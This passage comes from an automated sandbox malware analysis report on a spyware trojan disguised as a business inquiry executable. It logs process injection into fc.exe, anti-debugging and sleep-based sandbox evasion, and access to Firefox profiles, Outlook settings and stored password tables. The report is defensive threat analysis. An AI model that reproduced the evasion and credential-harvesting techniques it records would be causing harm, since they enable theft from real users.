              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0362AD005_2_0362AD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036BCD1F5_2_036BCD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0361ADE05_2_0361ADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03638DBF5_2_03638DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03620C005_2_03620C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03610CF25_2_03610CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036C0CB55_2_036C0CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0360D34C5_2_0360D34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D132D5_2_036D132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0366739A5_2_0366739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036C12ED5_2_036C12ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0363D2F05_2_0363D2F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0363B2C05_2_0363B2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036252A05_2_036252A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036EB16B5_2_036EB16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0365516C5_2_0365516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0360F1725_2_0360F172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0362B1B05_2_0362B1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D70E95_2_036D70E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DF0E05_2_036DF0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036CF0CC5_2_036CF0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036270C05_2_036270C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DF7B05_2_036DF7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036656305_2_03665630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D16CC5_2_036D16CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D75715_2_036D7571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036BD5B05_2_036BD5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036114605_2_03611460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DF43F5_2_036DF43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DFB765_2_036DFB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03695BF05_2_03695BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0365DBF95_2_0365DBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0363FB805_2_0363FB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03693A6C5_2_03693A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DFA495_2_036DFA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D7A465_2_036D7A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036CDAC65_2_036CDAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03665AA05_2_03665AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036BDAAC5_2_036BDAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036C1AA35_2_036C1AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036299505_2_03629950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0363B9505_2_0363B950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036B59105_2_036B5910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0368D8005_2_0368D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036238E05_2_036238E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DFF095_2_036DFF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DFFB15_2_036DFFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03621F925_2_03621F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03629EB05_2_03629EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D7D735_2_036D7D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03623D405_2_03623D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036D1D5A5_2_036D1D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0363FDC05_2_0363FDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03699C325_2_03699C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036DFCF25_2_036DFCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B41FD05_2_02B41FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B3CE805_2_02B3CE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B3D0A05_2_02B3D0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B3B0805_2_02B3B080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B3B07F5_2_02B3B07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B311E75_2_02B311E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B3B1D05_2_02B3B1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B3B1C45_2_02B3B1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B456805_2_02B45680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B438805_2_02B43880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B4387B5_2_02B4387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B5BCD05_2_02B5BCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338E2F55_2_0338E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338E7B35_2_0338E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338E57B5_2_0338E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338E4135_2_0338E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338CB135_2_0338CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338D8785_2_0338D878
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0360B970 appears 262 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0368EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0369F290 appears 103 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03655130 appears 58 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03667E54 appears 107 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 00E4F290 appears 103 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 00E05130 appears 58 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 00E3EA12 appears 86 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 00DBB970 appears 262 times
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: String function: 00E17E54 appears 107 times
              Source: CSZ inquiry for MH raw material.exeStatic PE information: No import functions for PE file found
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000001061000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2173539945.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2080312992.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2173539945.000000000087C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2082729262.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CSZ inquiry for MH raw material.exe
              Source: CSZ inquiry for MH raw material.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: CSZ inquiry for MH raw material.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@14/10
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: CSZ inquiry for MH raw material.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 00000005.00000002.4277873334.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4277873334.000000000309F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: CSZ inquiry for MH raw material.exeVirustotal: Detection: 67%
              Source: CSZ inquiry for MH raw material.exeReversingLabs: Detection: 65%
              Source: unknownProcess created: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe "C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe"
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: CSZ inquiry for MH raw material.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2173539945.000000000087C000.00000004.00000020.00020000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278088224.0000000000C08000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2173539945.000000000087C000.00000004.00000020.00020000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000004.00000002.4278088224.0000000000C08000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gGZaaTbTIZmmI.exe, 00000004.00000002.4277644545.000000000058E000.00000002.00000001.01000000.00000005.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000000.2244895308.000000000058E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: CSZ inquiry for MH raw material.exe, 00000000.00000003.2082729262.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.2080312992.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000F2E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4278696294.000000000377E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4278696294.00000000035E0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2175535576.0000000003438000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2173717947.000000000328A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: CSZ inquiry for MH raw material.exe, CSZ inquiry for MH raw material.exe, 00000000.00000003.2082729262.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000003.2080312992.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, CSZ inquiry for MH raw material.exe, 00000000.00000002.2174231836.0000000000F2E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000002.4278696294.000000000377E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4278696294.00000000035E0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2175535576.0000000003438000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2173717947.000000000328A000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00233863 push ss; iretd 0_2_00233880
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_002390BB pushad ; iretd 0_2_002390E4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00223490 push eax; ret 0_2_00223492
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00234DC4 pushfd ; retf 0_2_00234DCE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00D9225F pushad ; ret 0_2_00D927F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00D927FA pushad ; ret 0_2_00D927F9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00D9283D push eax; iretd 0_2_00D92858
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC09AD push ecx; mov dword ptr [esp], ecx0_2_00DC09B6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00D99939 push es; iretd 0_2_00D99940
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_036109AD push ecx; mov dword ptr [esp], ecx5_2_036109B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B4B011 push cs; retf 5_2_02B4B01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B4BB69 push ecx; ret 5_2_02B4BB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B4B98E push FFFFFFADh; ret 5_2_02B4B990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B41931 pushfd ; retf 5_2_02B4193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B45C28 pushad ; iretd 5_2_02B45C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B4DD8B push eax; iretd 5_2_02B4DDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338B3C8 push edi; ret 5_2_0338B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338B3C4 push edi; ret 5_2_0338B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03395202 push eax; ret 5_2_03395204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_033871EA push es; ret 5_2_033871EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338C033 push ss; iretd 5_2_0338C036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338BA5F push cs; retf 5_2_0338BA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0338AE60 push ds; retf 5_2_0338AE61
              Source: CSZ inquiry for MH raw material.exeStatic PE information: section name: .text entropy: 7.995219603624954
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E0096E rdtsc 0_2_00E0096E
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 3242Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 6731Jump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.7 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 5452Thread sleep count: 3242 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 5452Thread sleep time: -6484000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 5452Thread sleep count: 6731 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 5452Thread sleep time: -13462000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe TID: 4108Thread sleep time: -80000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe TID: 4108Thread sleep count: 35 > 30Jump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe TID: 4108Thread sleep time: -52500s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe TID: 4108Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe TID: 4108Thread sleep time: -37000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02B4C870 FindFirstFileW,FindNextFileW,FindClose,5_2_02B4C870
              Source: firefox.exe, 00000007.00000002.2477762717.000001E21747C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
              Source: fc.exe, 00000005.00000002.4277873334.0000000003000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: gGZaaTbTIZmmI.exe, 00000006.00000002.4278282422.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E0096E rdtsc 0_2_00E0096E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00237CA3 LdrLoadDll,0_2_00237CA3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E460E0 mov eax, dword ptr fs:[00000030h]0_2_00E460E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E020F0 mov ecx, dword ptr fs:[00000030h]0_2_00E020F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBC0F0 mov eax, dword ptr fs:[00000030h]0_2_00DBC0F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC80E9 mov eax, dword ptr fs:[00000030h]0_2_00DC80E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBA0E3 mov ecx, dword ptr fs:[00000030h]0_2_00DBA0E3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E420DE mov eax, dword ptr fs:[00000030h]0_2_00E420DE
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E580A8 mov eax, dword ptr fs:[00000030h]0_2_00E580A8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E860B8 mov eax, dword ptr fs:[00000030h]0_2_00E860B8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E860B8 mov ecx, dword ptr fs:[00000030h]0_2_00E860B8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC208A mov eax, dword ptr fs:[00000030h]0_2_00DC208A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB80A0 mov eax, dword ptr fs:[00000030h]0_2_00DB80A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC2050 mov eax, dword ptr fs:[00000030h]0_2_00DC2050
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DEC073 mov eax, dword ptr fs:[00000030h]0_2_00DEC073
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E46050 mov eax, dword ptr fs:[00000030h]0_2_00E46050
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE016 mov eax, dword ptr fs:[00000030h]0_2_00DDE016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE016 mov eax, dword ptr fs:[00000030h]0_2_00DDE016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE016 mov eax, dword ptr fs:[00000030h]0_2_00DDE016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE016 mov eax, dword ptr fs:[00000030h]0_2_00DDE016
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E56030 mov eax, dword ptr fs:[00000030h]0_2_00E56030
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E44000 mov ecx, dword ptr fs:[00000030h]0_2_00E44000
